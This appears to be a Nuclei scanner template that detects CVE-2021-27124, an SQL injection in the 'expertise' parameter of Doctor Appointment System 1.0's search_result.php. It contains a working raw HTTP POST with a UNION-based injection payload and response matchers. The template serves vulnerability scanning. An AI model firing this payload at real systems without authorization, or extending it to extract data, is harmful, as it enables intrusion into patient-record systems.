id: CVE-2021-27124 info: name: Doctor Appointment System 1.0 - SQL Injection author: theamanrawat severity: medium description: | SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html - https://packetstormsecurity.com/files/161342/Doctor-Appointment-System-1.0-SQL-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2021-27124 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-27124 cwe-id: CWE-89 epss-score: 0.01677 epss-percentile: 0.86307 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project http: - raw: - | POST /patient/search_result.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded expertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit= matchers-condition: and matchers: - type: word part: body words: - "c8c605999f3d8352d7bb792cf3fdb25b" - "Doctor Appoinment System" condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4a0a00473045022100d19e72889171e5d4f353acf5dc708b408d9a23d2cc35135e0d533d58cbf40ec80220545849729bcca004ed4ef4440e1789609a10c628dc8a0303b71fa8e2ceac919e:922c64590222798bb761d5b6d8e72950